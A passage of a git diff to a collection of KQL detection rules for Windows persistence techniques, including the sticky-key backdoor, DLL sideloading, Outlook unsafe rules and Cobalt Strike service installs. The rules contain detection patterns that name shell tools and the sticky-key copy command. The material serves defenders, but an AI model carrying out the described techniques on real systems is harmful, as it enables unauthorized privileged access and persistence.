and RegistryKey endswith "\\Security\\VBAWarnings" \ No newline at end of file diff --git a/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql b/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql index 474820dd..f3d70682 100644 --- a/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql +++ b/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql @@ -1,10 +1,10 @@ -// Title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-08 -// Level: high -// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: high +// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules" \ No newline at end of file diff --git a/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql b/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql index 2c548b80..842110b0 100644 --- a/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql +++ b/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql @@ -1,12 +1,12 @@ -// Title: Outlook Security Settings Updated - Registry -// Author: frack113 -// Date: 2021-12-28 -// Level: medium -// Description: Detects changes to the registry values related to outlook security settings -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137 -// False Positives: -// - Administrative activity - -DeviceRegistryEvents +// Title: Outlook Security Settings Updated - Registry +// Author: frack113 +// Date: 2021-12-28 +// Level: medium +// Description: Detects changes to the registry values related to outlook security settings +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Administrative activity + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Security*" \ No newline at end of file diff --git a/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql b/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql index 68500c23..0bfb3ba5 100644 --- a/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql +++ b/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql @@ -1,12 +1,12 @@ -// Title: Path To Screensaver Binary Modified -// Author: Bartlomiej Czyz @bczyz1, oscd.community -// Date: 2020-10-11 -// Level: medium -// Description: Detects value modification of registry key containing path to binary used as screensaver. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 -// False Positives: -// - Legitimate modification of screensaver - -DeviceRegistryEvents +// Title: Path To Screensaver Binary Modified +// Author: Bartlomiej Czyz @bczyz1, oscd.community +// Date: 2020-10-11 +// Level: medium +// Description: Detects value modification of registry key containing path to binary used as screensaver. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 +// False Positives: +// - Legitimate modification of screensaver + +DeviceRegistryEvents | where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql index a46ba71c..ea9b0f14 100644 --- a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql +++ b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql @@ -1,15 +1,15 @@ -// Title: Persistence Via Disk Cleanup Handler - Autorun -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: medium -// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. -// The disk cleanup manager is part of the operating system. -// It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. -// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. -// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. -// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. -// MITRE Tactic: Persistence -// Tags: attack.persistence - -DeviceRegistryEvents +// Title: Persistence Via Disk Cleanup Handler - Autorun +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. +// The disk cleanup manager is part of the operating system. +// It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. +// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. +// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. +// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql b/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql index f18dc1a9..5aadd689 100644 --- a/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql +++ b/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql @@ -1,12 +1,12 @@ -// Title: Persistence Via Hhctrl.ocx -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Persistence Via Hhctrl.ocx +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx")) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_new_sip_provider.kql b/KQL/rules/Persistence/persistence_via_new_sip_provider.kql index 84398537..9d4e9561 100644 --- a/KQL/rules/Persistence/persistence_via_new_sip_provider.kql +++ b/KQL/rules/Persistence/persistence_via_new_sip_provider.kql @@ -1,12 +1,12 @@ -// Title: Persistence Via New SIP Provider -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: medium -// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003 -// False Positives: -// - Legitimate SIP being registered by the OS or different software. - -DeviceRegistryEvents +// Title: Persistence Via New SIP Provider +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003 +// False Positives: +// - Legitimate SIP being registered by the OS or different software. + +DeviceRegistryEvents | where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql index 17e4ebb7..589ba46e 100644 --- a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql +++ b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql @@ -1,13 +1,13 @@ -// Title: Persistence Via Sticky Key Backdoor -// Author: Sreeman -// Date: 2020-02-18 -// Level: critical -// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. -// When the sticky keys are "activated" the privilleged shell is launched. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Persistence Via Sticky Key Backdoor +// Author: Sreeman +// Date: 2020-02-18 +// Level: critical +// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. +// When the sticky keys are "activated" the privilleged shell is launched. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql b/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql index 84f7d7e0..fc9bf38d 100644 --- a/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql +++ b/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql @@ -1,10 +1,10 @@ -// Title: Persistence Via TypedPaths - CommandLine -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-22 -// Level: medium -// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt -// MITRE Tactic: Persistence -// Tags: attack.persistence - -DeviceProcessEvents +// Title: Persistence Via TypedPaths - CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: medium +// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceProcessEvents | where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" \ No newline at end of file diff --git a/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql b/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql index 8b970fc6..0035caee 100644 --- a/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql +++ b/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql @@ -1,10 +1,10 @@ -// Title: Possible Privilege Escalation via Weak Service Permissions -// Author: Teymur Kheirkhabarov -// Date: 2019-10-26 -// Level: high -// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 - -DeviceProcessEvents +// Title: Possible Privilege Escalation via Weak Service Permissions +// Author: Teymur Kheirkhabarov +// Date: 2019-10-26 +// Level: high +// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents | where (FolderPath endswith "\\sc.exe" and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql b/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql index 0775aeb7..899523fe 100644 --- a/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential appverifUI.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-20 -// Level: high -// Description: Detects potential DLL sideloading of "appverifUI.dll" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential appverifUI.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-20 +// Level: high +// Description: Detects potential DLL sideloading of "appverifUI.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql b/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql index 67190992..ac2e714e 100644 --- a/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Potential AVKkid.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-08-03 -// Level: medium -// Description: Detects potential DLL sideloading of "AVKkid.dll" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential AVKkid.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential DLL sideloading of "AVKkid.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql index ee688555..e1f42f90 100644 --- a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql +++ b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql @@ -1,13 +1,13 @@ -// Title: Potential Azure Browser SSO Abuse -// Author: Den Iuzvyk -// Date: 2020-07-15 -// Level: low -// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. -// An attacker can use this to authenticate to Azure AD in a browser as that user. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity - -DeviceImageLoadEvents +// Title: Potential Azure Browser SSO Abuse +// Author: Den Iuzvyk +// Date: 2020-07-15 +// Level: low +// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. +// An attacker can use this to authenticate to Azure AD in a browser as that user. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity + +DeviceImageLoadEvents | where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql b/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql index 91e07edd..0b8e07fa 100644 --- a/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql +++ b/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql @@ -1,12 +1,12 @@ -// Title: Potential Binary Or Script Dropper Via PowerShell -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-17 -// Level: medium -// Description: Detects PowerShell creating a binary executable or a script file. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. - -DeviceFileEvents +// Title: Potential Binary Or Script Dropper Via PowerShell +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-17 +// Level: medium +// Description: Detects PowerShell creating a binary executable or a script file. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not(((FolderPath endswith "\\Microsoft.PackageManagement.NuGetProvider.dll" and FolderPath startswith "C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\") or ((FolderPath endswith ".dll" or FolderPath endswith ".exe") and (FolderPath startswith "C:\\Windows\\Temp\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\")) or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Users\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql index d8fcf124..6a2951a5 100644 --- a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql +++ b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql @@ -1,12 +1,12 @@ -// Title: Potential CobaltStrike Service Installations - Registry -// Author: Wojciech Lesicki -// Date: 2021-06-29 -// Level: high -// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potential CobaltStrike Service Installations - Registry +// Author: Wojciech Lesicki +// Date: 2021-06-29 +// Level: high +// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql b/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql index 48b94c8c..f6502254 100644 --- a/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential EACore.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-08-03 -// Level: high -// Description: Detects potential DLL sideloading of "EACore.dll" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential EACore.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-03 +// Level: high +// Description: Detects potential DLL sideloading of "EACore.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql b/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql index 13ffbca1..4b0af827 100644 --- a/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential Edputil.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-09 -// Level: high -// Description: Detects potential DLL sideloading of "edputil.dll" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential Edputil.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: high +// Description: Detects potential DLL sideloading of "edputil.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql b/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql index bc09ff85..02fc4958 100644 --- a/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql @@ -1,13 +1,13 @@ -// Title: Potential Goopdate.DLL Sideloading -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: medium -// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly. -// - Other third party chromium browsers located in AppData - -DeviceImageLoadEvents +// Title: Potential Goopdate.DLL Sideloading +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: medium +// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly. +// - Other third party chromium browsers located in AppData + +DeviceImageLoadEvents | where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not((((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")) or ((FolderPath contains "\\AppData\\Local\\Temp\\GUM" or FolderPath contains ":\\Windows\\SystemTemp\\GUM") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" or InitiatingProcessFolderPath contains ":\\Windows\\SystemTemp\\GUM") and InitiatingProcessFolderPath endswith ".tmp\\GoogleUpdate.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql b/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql index 73a2d0c8..e443ad8c 100644 --- a/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Potential Iviewers.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-03-21 -// Level: high -// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential Iviewers.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-03-21 +// Level: high +// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql b/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql index c9a9cef3..c6a92fed 100644 --- a/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential Mfdetours.DLL Sideloading -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-03 -// Level: medium -// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential Mfdetours.DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, 